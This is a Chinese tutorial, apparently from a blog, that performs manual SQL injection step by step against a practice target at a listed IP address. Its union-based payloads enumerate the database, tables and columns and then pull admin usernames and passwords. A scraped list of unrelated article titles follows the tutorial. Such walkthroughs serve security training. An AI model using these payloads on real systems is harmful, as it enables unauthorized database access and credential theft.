查:有多少行

进去是这样的:直接点击

可以看到:我们的url发生了变化,

id是啥,我们猜测,id是数据库的前面的序号,像这样.
我们输入不同的id,可以得到不同的数据库,那么页面也就不同.

测试:id=3,有网页,我们接着测试id=4 id=5 id=6 发现都没有内容

说明id=3 的时候,数据表内容已经"见底"了

于是我们就知道了这个数据表有四行,包括id=0的初始页面

查:有多少列

使用order by 语句.
我从 1~3查,发现3没有,2有.
那么就证明这个数据表就两个字段

读者可以自行去谷歌应用商店下载hackbar或者类似插件

http://59.63.200.79:8003/?id=1 order by 2

所以,这个数据表,4行2列.

判断回显点

回显点就是数据表中的哪个内容可以在网页中显示.
通常用联合查询. 我们知道,这有两个字段.
所以:

http://59.63.200.79:8003/?id=1 union select 1,2

嗯?没反应,还是显示那个内容

我们通过MySQL演示,发现我们注入的select 1,2都在数据表的最底部

想让它显示出来,两种办法

  • 添加错误条件在前面,让它不显示
  • 显示限制条件
http://59.63.200.79:8003/?id=1 and 1=2 union select 1,2
http://59.63.200.79:8003/?id=1 union select 1,2 limit 1,1
# 任意一种

于是,有一个2就显露出来了,这个2就是回显点!

查:数据库名称

更换url,使用database(),显示出数据库名称

http://59.63.200.79:8003/?id=1 and 1=2 union select 1,database()

数据库的名称是maoshe

查:数据表名称

这段代码的意思是,在information_schema.tables这个数据表中,从table_name 这一列中,查找在table_schema这一列中数据库等于当前数据库名称的各个数据表名.

http://59.63.200.79:8003/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()

好,数据表名是admin

查:字段名称

group_concat()这个函数可以显示出所有有关的内容,否则就默认显示出第一行的.
列名肯定不止一个,所以我们要一起显示出来.
其实上面也可以用 group_concat(),自行体会一下

http://59.63.200.79:8003/?id=1  union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='admin'  limit 1,100

查:单元格内容

最爱的 username 和password来了.
看一看他们都有些啥

http://59.63.200.79:8003/?id=1  and 1=2 union select 1,group_concat(username) from admin

http://59.63.200.79:8003/?id=1  and 1=2 union select 1,group_concat(password) from admin


至此,SQL注入演示完毕.

其实sqlmap更快,但没必要

SQL注入靶场:辛巴猫舍相关推荐

  1. 通过SQL手工注入拿到管理员密码--辛巴猫舍

    通过SQL手工注入拿到管理员密码–辛巴猫舍 靶场地址: http://rhiq8003.ia.aqlab.cn/ 点击新闻页面看看 域名后面加上了id=1,说明存在着数据库的交互 那么这里就很有可能是 ...

  2. 关于SQL注入靶场搭建及过关教程

    关于SQL注入靶场搭建及过关教程 1.需要环境: 下载安装VMware,在虚拟机上布置虚拟机win7或winXP(个人推荐win7,使用界面与现在的win10界面较为相似,使用起来比较舒适) Win7 ...

  3. 一次简单的SQL注入靶场练习

    一次简单的SQL注入靶场练习 文章目录 一次简单的SQL注入靶场练习 前言 一.靶机下载 二.靶场渗透 1.端口扫描 总结 前言 为了巩固SQL注入以及实战演练的需要,我们来做一次简单的关于SQL注入 ...

  4. SQL注入靶场 RedTiger通关教程(level1~level10)

    Sql注入 介绍 Sql注入指的是通过构建特殊的数据查询语句 作为参数传入Web应用程序,通过数据库执行SQL语句来非法获取数据过程. 其主要原因是开发者/建站商写代码时,对用户提交的数据没有做细致的 ...

  5. 五分钟制作sql注入靶场

    接触安全也快两个月了,学了很多安全的知识,也接触到了渗透测试,前面学习了sql注入和XSS漏洞,听郭老师说可以尝试自己搭建一个靶场,所以开始制作自己靶场! 目录 一.数据库 文件db-creds.in ...

  6. 开普勒sql注入靶场学习

    0x00 靶场搭建 下载地址 https://github.com/admin360bug/PHP 安装方法 导入localhost.sql数据库 修改APP/mysql.class.php 数据库配 ...

  7. 第一次CTF【后台登录、简单的sql注入之、简单的sql注入之2、猫抓老鼠、i春秋 文件上传】

    后台登录 http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 根据md5($password,true)最后要得到原始二进制字符串,要含有or ,在or ...

  8. SQl注入靶场sqli——第一关

    在浏览器中 使用?id=1'–+ 是可以闭合的但是直接在数据库中查询就不会被闭合,这里估计是网页代码闭合的原因,在数据库中没有代码直接查询语句. 接下来是在闭合中添加语句执行我们想要的命令 使用 or ...

  9. SQL注入(1)--判断是否存在SQL注入漏洞

    什么是SQL注入 不论是学习后端开发/数据库/网络安全,SQL注入安全隐患反复被提起 到底什么是SQL? 维基百科的定义: (1)什么是SQL? SQL是用来操控数据库的语言 (2)举一个例子,现在我 ...

最新文章

  1. 来宾可以删除服务器文件怎么设置密码,服务器来宾用用户设置密码
  2. 在quartus 和 ISE 里直接调用modelsim的方法(转)
  3. Java黑皮书课后题第6章:*6.15(金融应用:打印税表)程序清单3-5给出了计算税款的程序。使用下面的方法体编写一个计算税款的方法。使用这个方法编写程序,打印可征税人从50000到60000间隔
  4. Java实现身份证号码的验证,JAVA后台验证身份证号码
  5. win10安装TortoiseGit
  6. mybatis 映射成多个list_SSM:Mybatis架构与原理
  7. 比特币市值目前是白银68%
  8. sqlplus可以连接plsql连接不上_Gee引擎配置微端不更新,连接不上,尝试重新连接的解决方法...
  9. mysql 下一个月_mysql 取当天、昨天、上一个月、当前月和下个月数据
  10. 【Axure元件库】彩色圆形图标库 810+个矢量扁平化图标
  11. <2021SC@SDUSC>开源游戏引擎Overload代码分析五:OvEditor——RawShaders.cpp
  12. 日企抛等离子淘汰论 专家称其不敌中国企业
  13. Python如何批量把图片地址输入到浏览器上
  14. Choco包管理工具安装
  15. 弘兵金融学院 站在山顶 看不见山
  16. 好男人都死到哪去了?
  17. 【软考笔记】1. 计算机原理与体系结构
  18. 使用 Packer 自动执行 VMware vsphere 模板
  19. 什么是MyBatis?怎么操作MyBatis?
  20. 扩充虚拟机文件系统的磁盘空间

热门文章

  1. 什么时候用C而不用C++?
  2. mysql dbms是什么_什么是DBMS
  3. 百万互动出圈爆品复盘,小红书品牌如何高效打造爆品?
  4. mysql 分数相加_分数求和
  5. 数据挖掘技术的算法与应用
  6. 科学探索奖名单揭晓:北大数学「黄金一代」袁新意上榜,首现90后获奖人
  7. matlab编程勒让德多项式展开例题解析,第19 勒让德多项式 球函数习题及解答
  8. python发邮件附件_python 发送带附件的邮件
  9. 明日之后如何注销一个服务器的账号,明日之后账号怎么注销_明日之后账号注销方法介绍_玩游戏网...
  10. 总结下macbook 安装win10 双系统丢驱动的问题